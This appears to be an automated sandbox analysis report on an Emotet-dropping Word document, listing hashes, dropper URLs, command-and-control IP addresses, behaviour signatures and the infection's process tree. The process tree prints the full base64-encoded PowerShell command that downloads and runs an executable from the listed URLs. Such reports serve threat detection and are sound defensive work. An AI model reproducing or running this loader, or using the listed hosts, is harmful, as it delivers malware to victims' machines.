Analysis

  • max time kernel
    138s
  • max time network
    146s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    19-09-2020 13:06

General

  • Target

    BLT2009.doc

  • Size

    163KB

  • MD5

    3bed1986a9ac94fba68c471fb4bcfc20

  • SHA1

    9b8a01bc85ac72c25311bb8b934be6071ffedeb9

  • SHA256

    24750ed2a7cbc122fca96df6f6ed3a3b879906272abbbcc636db5a6a441f68d2

  • SHA512

    7f9870114bb40a322b3013053505319774d04f20a11840b391c4a668c84f285ccc5ca2df5ad201d6bd7263434483bb7cdb49fadaed74626dfa9625fbeb86617b

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://dheeranet.com/Pej/

exe.dropper

http://playschoolmatritva.com/cgi-bin/Uh/

exe.dropper

http://dikshadayal.com/cgi-bin/Zl78esq/

exe.dropper

http://new.mylicense.ca/5aiibj/vS2/

exe.dropper

http://nucleokardecistalace.org.br/wp-includes/HviA/

exe.dropper

http://britanniacricketleague.com/wp-admin/3qc8lQB/

exe.dropper

https://www.hhbiao.com/ro/4Kh/

Extracted

Family

emotet

C2

71.72.196.159:80

134.209.36.254:8080

120.138.30.150:8080

94.23.216.33:80

157.245.99.39:8080

137.59.187.107:8080

94.23.237.171:443

61.19.246.238:443

156.155.166.221:80

50.35.17.13:80

153.137.36.142:80

91.211.88.52:7080

209.141.54.221:8080

185.94.252.104:443

174.45.13.118:80

87.106.136.232:8080

62.75.141.82:80

213.196.135.145:80

188.219.31.12:80

82.80.155.43:80

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 8 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\BLT2009.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:3740
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -encod JABNAHUAcQB4AGoAcwBiAD0AKAAoACcAQwAnACsAJwBiADEAJwApACsAKAAnAG0ANwAnACsAJwBfADAAJwApACkAOwAmACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AVgA6AHUAcwBlAHIAcABSAE8AZgBJAEwAZQBcAEQARgBiAHEAbQBLADUAXABBAF8AagB6ADQATwA1AFwAIAAtAGkAdABlAG0AdAB5AHAAZQAgAGQAaQByAEUAQwB0AE8AcgB5ADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwBVAGAAUgBgAEkAdABZAHAAcgBgAE8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACcAdABsACcAKwAnAHMAMQAnACsAJwAyACcAKwAoACcALAAgAHQAbAAnACsAJwBzADEAMQAnACsAJwAsACAAdAAnACkAKwAnAGwAcwAnACkAOwAkAEsAagA5ADcAbwBiAGsAIAA9ACAAKAAoACcASwAnACsAJwB2AGMAJwApACsAKAAnADIAZwBkACcAKwAnAG4AJwApACkAOwAkAEMANQBfADUAagBpADUAPQAoACcATAAnACsAJwBfAHAAJwArACgAJwA1ACcAKwAnAHYAeQBnACcAKQApADsAJABMADgAMQBfADUAcwA4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHQAOQAnACsAKAAnADEAJwArACcARABmAGIAcQAnACkAKwAnAG0AawAnACsAKAAnADUAJwArACcAdAA5ADEAQQAnACsAJwBfACcAKQArACgAJwBqAHoAJwArACcANABvACcAKwAnADUAdAA5ACcAKQArACcAMQAnACkALQBDAHIAZQBwAGwAYQBjAEUAKAAnAHQAJwArACcAOQAxACcAKQAsAFsAYwBIAEEAUgBdADkAMgApACsAJABLAGoAOQA3AG8AYgBrACsAKAAnAC4AZQAnACsAJwB4AGUAJwApADsAJABDAHkAbgBsAHYAcgBiAD0AKAAoACcAQQA4AGoAaAAnACsAJwBtAGMAJwApACsAJwAzACcAKQA7ACQARQBhAGoANwB0ADAAcgA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAHQALgB3AEUAYgBjAGwASQBFAE4AdAA7ACQAWABhAHkAZAB3ADQANgA9ACgAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAGQAJwArACcAaABlAGUAcgBhAG4AZQAnACkAKwAoACcAdAAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAFAAJwApACsAKAAnAGUAagAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHAAbABhACcAKwAnAHkAcwBjACcAKQArACgAJwBoAG8AJwArACcAbwBsAG0AYQB0AHIAJwArACcAaQAnACkAKwAoACcAdAB2AGEAJwArACcALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AJwArACcAYwBnAGkAJwArACcALQBiAGkAbgAvACcAKQArACcAVQAnACsAKAAnAGgAJwArACcALwAqAGgAJwApACsAJwB0ACcAKwAoACcAdAAnACsAJwBwADoAJwApACsAKAAnAC8ALwBkACcAKwAnAGkAawAnACkAKwAoACcAcwBoAGEAJwArACcAZABhACcAKQArACgAJwB5AGEAJwArACcAbAAuAGMAJwApACsAKAAnAG8AJwArACcAbQAnACsAJwAvAGMAZwBpAC0AJwApACsAKAAnAGIAaQAnACsAJwBuAC8AWgAnACkAKwAoACcAbAA3ADgAJwArACcAZQBzACcAKQArACgAJwBxAC8AKgBoAHQAJwArACcAdABwADoALwAnACsAJwAvAG4AJwApACsAKAAnAGUAJwArACcAdwAuAG0AJwArACcAeQBsAGkAJwApACsAKAAnAGMAJwArACcAZQBuACcAKQArACgAJwBzACcAKwAnAGUALgBjAGEAJwApACsAKAAnAC8ANQAnACsAJwBhACcAKQArACgAJwBpACcAKwAnAGkAYgAnACkAKwAoACcAagAvAHYAUwAnACsAJwAyAC8AKgAnACsAJwBoAHQAdAAnACsAJwBwADoAJwApACsAKAAnAC8AJwArACcALwBuACcAKQArACcAdQBjACcAKwAoACcAbAAnACsAJwBlAG8AJwApACsAJwBrAGEAJwArACgAJwByAGQAZQBjAGkAJwArACcAcwB0ACcAKwAnAGEAbABhACcAKwAnAGMAJwApACsAKAAnAGUAJwArACcALgBvACcAKQArACgAJwByAGcALgAnACsAJwBiAHIAJwApACsAKAAnAC8AdwBwAC0AJwArACcAaQAnACkAKwAoACcAbgAnACsAJwBjAGwAdQBkACcAKwAnAGUAcwAnACkAKwAnAC8ASAAnACsAJwB2ACcAKwAoACcAaQBBACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAOgAnACsAJwAvAC8AJwApACsAKAAnAGIAJwArACcAcgBpACcAKQArACgAJwB0ACcAKwAnAGEAbgAnACkAKwAoACcAbgBpACcAKwAnAGEAYwAnACkAKwAoACcAcgAnACsAJwBpAGMAawBlAHQAJwApACsAJwBsACcAKwAoACcAZQBhAGcAdQBlAC4AYwBvAG0AJwArACcALwAnACsAJwB3ACcAKwAnAHAALQBhAGQAbQBpACcAKwAnAG4AJwApACsAJwAvACcAKwAnADMAcQAnACsAKAAnAGMAJwArACcAOABsACcAKQArACgAJwBRAEIAJwArACcALwAqAGgAJwArACcAdAB0AHAAJwApACsAKAAnAHMAJwArACcAOgAvAC8AdwB3AHcAJwApACsAKAAnAC4AaABoAGIAaQBhACcAKwAnAG8ALgBjAG8AJwArACcAbQAvACcAKQArACcAcgAnACsAKAAnAG8ALwA0ACcAKwAnAEsAaAAnACkAKwAnAC8AJwApAC4AIgBzAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEUAbAB1AHAAcwBoAGUAPQAoACcARwAxACcAKwAoACcAOAAnACsAJwA3AHUAZgAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQASgAxAF8AaAA3AGkAdQAgAGkAbgAgACQAWABhAHkAZAB3ADQANgApAHsAdAByAHkAewAkAEUAYQBqADcAdAAwAHIALgAiAGQAbwBXAG4ATABgAE8AYABBAEQAZgBgAEkAbABlACIAKAAkAEoAMQBfAGgANwBpAHUALAAgACQATAA4ADEAXwA1AHMAOAApADsAJABMAHAAeAB0ADEAYwB1AD0AKAAnAFUAOQAnACsAKAAnADUAbQAwACcAKwAnAHcAJwApACsAJwB4ACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABMADgAMQBfADUAcwA4ACkALgAiAGwAYABFAG4AYABnAHQAaAAiACAALQBnAGUAIAAyADcANAA0ADQAKQAgAHsALgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAoACQATAA4ADEAXwA1AHMAOAApADsAJABBAHgAawBkADIAZgA3AD0AKAAoACcATQBjACcAKwAnADcAJwApACsAKAAnAHUAZwAnACsAJwByACcAKQArACcANwAnACkAOwBiAHIAZQBhAGsAOwAkAE4AMwA5AHAAaQB5AGUAPQAoACcAWQAnACsAJwB5ACcAKwAoACcAdgBvACcAKwAnADQAOAB4ACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABOAHgAdQBzAHIAeQB6AD0AKAAnAFQAXwAnACsAKAAnAGkAJwArACcAXwB5AGIAJwApACsAJwB3ACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2808
    • C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe
      "C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      PID:1308
      • C:\Windows\SysWOW64\AdmTmpl\ntmarta.exe
        "C:\Windows\SysWOW64\AdmTmpl\ntmarta.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:1652

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\DFbqmK5\A_jz4O5\Kvc2gdn.exe
  • C:\Users\Admin\Dfbqmk5\A_jz4o5\Kvc2gdn.exe
  • C:\Windows\SysWOW64\AdmTmpl\ntmarta.exe
  • memory/1308-13-0x0000000000000000-mapping.dmp
  • memory/1308-17-0x00000000004C0000-0x00000000004D0000-memory.dmp
    Filesize

    64KB

  • memory/1308-16-0x00000000021C0000-0x00000000021D2000-memory.dmp
    Filesize

    72KB

  • memory/1652-21-0x00000000001F0000-0x0000000000200000-memory.dmp
    Filesize

    64KB

  • memory/1652-20-0x00000000005F0000-0x0000000000602000-memory.dmp
    Filesize

    72KB

  • memory/1652-18-0x0000000000000000-mapping.dmp
  • memory/2808-12-0x000001F56CDE0000-0x000001F56CDE1000-memory.dmp
    Filesize

    4KB

  • memory/2808-11-0x000001F554630000-0x000001F554631000-memory.dmp
    Filesize

    4KB

  • memory/2808-10-0x00007FFA64200000-0x00007FFA64BEC000-memory.dmp
    Filesize

    9.9MB

  • memory/3740-0-0x00007FFA6B4B0000-0x00007FFA6BB76000-memory.dmp
    Filesize

    6.8MB

  • memory/3740-9-0x000001B11516A000-0x000001B11517B000-memory.dmp
    Filesize

    68KB

  • memory/3740-8-0x000001B11516A000-0x000001B11517B000-memory.dmp
    Filesize

    68KB

  • memory/3740-7-0x000001B11516A000-0x000001B11517B000-memory.dmp
    Filesize

    68KB

  • memory/3740-6-0x000001B11516A000-0x000001B11517B000-memory.dmp
    Filesize

    68KB

  • memory/3740-5-0x000001B1157D0000-0x000001B1157F2000-memory.dmp
    Filesize

    136KB